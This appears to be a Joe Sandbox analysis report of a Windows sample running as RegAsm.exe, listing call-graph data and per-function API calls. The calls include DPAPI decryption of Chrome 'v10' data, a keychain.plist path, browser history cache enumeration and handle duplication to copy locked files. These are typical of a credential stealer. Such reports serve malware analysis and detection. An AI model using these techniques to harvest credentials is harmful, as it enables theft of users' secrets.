39572 4437be 39576 416760 11 API calls 39572->39576 39577 4437de 39572->39577 39573->39563 39574->39563 39575->39572 39581 415c56 11 API calls 39575->39581 39576->39577 39578 42463b memset memcpy 39577->39578 39580 443801 39577->39580 39578->39580 39579 443826 39583 43bd08 memset 39579->39583 39580->39579 39582 43024d memset 39580->39582 39581->39572 39582->39579 39584 443837 39583->39584 39584->39585 39586 43024d memset 39584->39586 39585->39542 39586->39584 39588 438246 39587->39588 39590 4381ba 39587->39590 39588->39539 39589 41f432 109 API calls 39589->39590 39590->39588 39590->39589 39591 41f638 103 API calls 39590->39591 39591->39590 39592->39536 39593->39526 39594->39537 39595->39546 39596->39545 39597->39544 39598->39526 39599->39526 39600->39531 39601->39282 39602->39286 39604 425108 39603->39604 39610 42510d 39603->39610 39648 424f74 123 API calls 39604->39648 39607 42516e 39649 415c7d 16 API calls 39607->39649 39608 425115 39608->39288 39610->39608 39616 42569b 39610->39616 39611->39288 39612->39288 39613->39296 39614->39295 39615->39286 39627 4256f1 39616->39627 39644 4259c2 39616->39644 39621 4260dd 39661 424251 119 API calls 39621->39661 39622 429a4d 39629 429a66 39622->39629 39630 429a9b 39622->39630 39626 422aeb memset memcpy memcpy 39626->39627 39627->39622 39627->39626 39632 4260a1 39627->39632 39641 4259da 39627->39641 39642 429ac1 39627->39642 39627->39644 39647 425a38 39627->39647 39650 4227f0 memset memcpy 39627->39650 39651 422b84 15 API calls 39627->39651 39652 422b5d memset memcpy memcpy 39627->39652 39653 422640 13 API calls 39627->39653 39655 4241fc 11 API calls 39627->39655 39656 42413a 89 API calls 39627->39656 39662 415c56 11 API calls 39629->39662 39631 429a96 39630->39631 39664 416760 11 API calls 39630->39664 39665 424251 119 API calls 39631->39665 39659 415c56 11 API calls 39632->39659 39634 429a7a 39663 416760 11 API calls 39634->39663 39660 416760 11 API calls 39641->39660 39643 425ad6 39642->39643 39666 415c56 11 API calls 
39642->39666 39643->39607 39644->39643 39654 415c56 11 API calls 39644->39654 39647->39644 39657 422640 13 API calls 39647->39657 39658 4226e0 12 API calls 39647->39658 39648->39610 39649->39608 39650->39627 39651->39627 39652->39627 39653->39627 39654->39641 39655->39627 39656->39627 39657->39647 39658->39647 39659->39641 39660->39621 39661->39643 39662->39634 39663->39631 39664->39631 39665->39642 39666->39641 39667->38759 39668->38767 39669 44dea5 39670 44deb5 FreeLibrary 39669->39670 39671 44dec3 39669->39671 39670->39671 39672 4147f3 39675 414561 39672->39675 39674 414813 39676 41456d 39675->39676 39677 41457f GetPrivateProfileIntW 39675->39677 39680 4143f1 memset _itow WritePrivateProfileStringW 39676->39680 39677->39674 39679 41457a 39679->39674 39680->39679 39681 44def7 39682 44df07 39681->39682 39683 44df00 ??3@YAXPAX 39681->39683 39684 44df17 39682->39684 39685 44df10 ??3@YAXPAX 39682->39685 39683->39682 39686 44df27 39684->39686 39687 44df20 ??3@YAXPAX 39684->39687 39685->39684 39688 44df37 39686->39688 39689 44df30 ??3@YAXPAX 39686->39689 39687->39686 39689->39688 39690 4287c1 39691 4287d2 39690->39691 39692 429ac1 39690->39692 39693 428818 39691->39693 39694 42881f 39691->39694 39709 425711 39691->39709 39704 425ad6 39692->39704 39760 415c56 11 API calls 39692->39760 39727 42013a 39693->39727 39755 420244 96 API calls 39694->39755 39698 4260dd 39754 424251 119 API calls 39698->39754 39702 4259da 39753 416760 11 API calls 39702->39753 39705 429a4d 39711 429a66 39705->39711 39712 429a9b 39705->39712 39708 422aeb memset memcpy memcpy 39708->39709 39709->39692 39709->39702 39709->39705 39709->39708 39714 4260a1 39709->39714 39723 4259c2 39709->39723 39726 425a38 39709->39726 39743 4227f0 memset memcpy 39709->39743 39744 422b84 15 API calls 39709->39744 39745 422b5d memset memcpy memcpy 39709->39745 39746 422640 13 API calls 39709->39746 39748 4241fc 11 API calls 39709->39748 39749 42413a 89 API calls 39709->39749 39756 415c56 11 API calls 39711->39756 
39713 429a96 39712->39713 39758 416760 11 API calls 39712->39758 39759 424251 119 API calls 39713->39759 39752 415c56 11 API calls 39714->39752 39716 429a7a 39757 416760 11 API calls 39716->39757 39723->39704 39747 415c56 11 API calls 39723->39747 39726->39723 39750 422640 13 API calls 39726->39750 39751 4226e0 12 API calls 39726->39751 39728 42014c 39727->39728 39731 420151 39727->39731 39770 41e466 96 API calls 39728->39770 39730 420162 39730->39709 39731->39730 39732 4201b3 39731->39732 39733 420229 39731->39733 39734 4201b8 39732->39734 39735 4201dc 39732->39735 39733->39730 39736 41fd5e 85 API calls 39733->39736 39761 41fbdb 39734->39761 39735->39730 39740 4201ff 39735->39740 39767 41fc4c 39735->39767 39736->39730 39740->39730 39742 42013a 96 API calls 39740->39742 39742->39730 39743->39709 39744->39709 39745->39709 39746->39709 39747->39702 39748->39709 39749->39709 39750->39726 39751->39726 39752->39702 39753->39698 39754->39704 39755->39709 39756->39716 39757->39713 39758->39713 39759->39692 39760->39702 39762 41fbf8 39761->39762 39765 41fbf1 39761->39765 39775 41ee26 39762->39775 39766 41fc39 39765->39766 39785 4446ce 11 API calls 39765->39785 39766->39730 39771 41fd5e 39766->39771 39768 41ee6b 85 API calls 39767->39768 39769 41fc5d 39768->39769 39769->39735 39770->39731 39773 41fd65 39771->39773 39772 41fdab 39772->39730 39773->39772 39774 41fbdb 85 API calls 39773->39774 39774->39773 39776 41ee41 39775->39776 39777 41ee32 39775->39777 39786 41edad 39776->39786 39789 4446ce 11 API calls 39777->39789 39780 41ee3c 39780->39765 39783 41ee58 39783->39780 39791 41ee6b 39783->39791 39785->39766 39795 41be52 39786->39795 39789->39780 39790 41eb85 11 API calls 39790->39783 39792 41ee70 39791->39792 39793 41ee78 39791->39793 39833 41bf99 85 API calls 39792->39833 39793->39780 39796 41be6f 39795->39796 39797 41be5f 39795->39797 39802 41be8c 39796->39802 39827 418c63 memset memset 39796->39827 39826 4446ce 11 API calls 39797->39826 39799 41be69 39799->39780 

                          Control-flow Graph
                          • Function 40dd85 (interactive graph with executed / not-executed block markers; node and edge data not reproduced)
                          APIs
                          • memset.MSVCRT ref: 0040DDAD
                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                            • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                          • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                          • CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                          • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                          • _wcsicmp.MSVCRT ref: 0040DEB2
                          • _wcsicmp.MSVCRT ref: 0040DEC5
                          • _wcsicmp.MSVCRT ref: 0040DED8
                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                          • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                          • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                          • memset.MSVCRT ref: 0040DF5F
                          • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                          • _wcsicmp.MSVCRT ref: 0040DFB2
                          • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                          • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                          • API String ID: 2018390131-3398334509
                          • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                          • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                          APIs
                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                            • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                          • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                          • free.MSVCRT ref: 00418803
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                          • String ID:
                          • API String ID: 1355100292-0
                          • Opcode ID: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                          • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                          • Opcode Fuzzy Hash: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                          • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                          • String ID:
                          • API String ID: 1945712969-0
                          • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                          • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                          • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                          • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                          • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FileFind$FirstNext
                          • String ID:
                          • API String ID: 1690352074-0
                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                          APIs
                          • memset.MSVCRT ref: 0041898C
                          • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InfoSystemmemset
                          • String ID:
                          • API String ID: 3558857096-0
                          • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                          • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                          Control-flow Graph
                          • Function 44553b (interactive graph with executed / not-executed block markers; node and edge data not reproduced)
                          APIs
                          • memset.MSVCRT ref: 004455C2
                          • wcsrchr.MSVCRT ref: 004455DA
                          • memset.MSVCRT ref: 0044570D
                          • memset.MSVCRT ref: 00445725
                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                            • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                            • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                          • memset.MSVCRT ref: 0044573D
                          • memset.MSVCRT ref: 00445755
                          • memset.MSVCRT ref: 004458CB
                          • memset.MSVCRT ref: 004458E3
                          • memset.MSVCRT ref: 0044596E
                          • memset.MSVCRT ref: 00445A10
                          • memset.MSVCRT ref: 00445A28
                          • memset.MSVCRT ref: 00445AC6
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                          • memset.MSVCRT ref: 00445B52
                          • memset.MSVCRT ref: 00445B6A
                          • memset.MSVCRT ref: 00445C9B
                          • memset.MSVCRT ref: 00445CB3
                          • _wcsicmp.MSVCRT ref: 00445D56
                          • memset.MSVCRT ref: 00445B82
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                            • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                          • memset.MSVCRT ref: 00445986
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                          • API String ID: 2334598624-3798722523
                          • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                          • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                          Control-flow Graph

                          APIs
                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                          • SetErrorMode.KERNEL32(00008001), ref: 00412799
                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                          • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                          • String ID: $/deleteregkey$/savelangfile
                          • API String ID: 1442760552-28296030
                          • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                          • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                          Control-flow Graph

                          APIs
                          • memset.MSVCRT ref: 0040B71C
                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                          • wcsrchr.MSVCRT ref: 0040B738
                          • memset.MSVCRT ref: 0040B756
                          • memset.MSVCRT ref: 0040B7F5
                          • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                          • CloseHandle.KERNEL32(00000000), ref: 0040B838
                          • memset.MSVCRT ref: 0040B851
                          • memset.MSVCRT ref: 0040B8CA
                          • memcmp.MSVCRT ref: 0040B9BF
                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                          • memset.MSVCRT ref: 0040BB53
                          • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                          • String ID: chp$v10
                          • API String ID: 229402216-2783969131
                          • Opcode ID: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                          • Opcode Fuzzy Hash: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                          • memset.MSVCRT ref: 00413D7F
                          • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                          • memset.MSVCRT ref: 00413E07
                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                          • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                          • CloseHandle.KERNEL32(?), ref: 00413EA8
                          • free.MSVCRT ref: 00413EC1
                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                          • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Handle$CloseProcessProcess32freememset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                          • API String ID: 3957639419-1740548384
                          • Opcode ID: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                          • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                          • Opcode Fuzzy Hash: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                          • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                            • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                            • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                          • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                            • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                            • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                          • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                          • CloseHandle.KERNEL32(?), ref: 0040E13E
                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                          • CloseHandle.KERNEL32(?), ref: 0040E148
                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                          • String ID: bhv
                          • API String ID: 4234240956-2689659898
                          • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                          • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                          • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                          • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                          Control-flow Graph

                          APIs
                          • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                          • __set_app_type.MSVCRT ref: 00446762
                          • __p__fmode.MSVCRT ref: 00446777
                          • __p__commode.MSVCRT ref: 00446785
                          • __setusermatherr.MSVCRT ref: 004467B1
                          • _initterm.MSVCRT ref: 004467C7
                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                          • _initterm.MSVCRT ref: 004467FD
                          • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                          • exit.MSVCRT ref: 00446897
                          • _cexit.MSVCRT ref: 0044689D
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                          • String ID:
                          • API String ID: 2791496988-0
                          • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                          • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                          • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                          • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                          Control-flow Graph

                          APIs
                          • memset.MSVCRT ref: 0040C298
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                          • wcschr.MSVCRT ref: 0040C324
                          • wcschr.MSVCRT ref: 0040C344
                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                          • GetLastError.KERNEL32 ref: 0040C373
                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                          • String ID: visited:
                          • API String ID: 2470578098-1702587658
                          • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
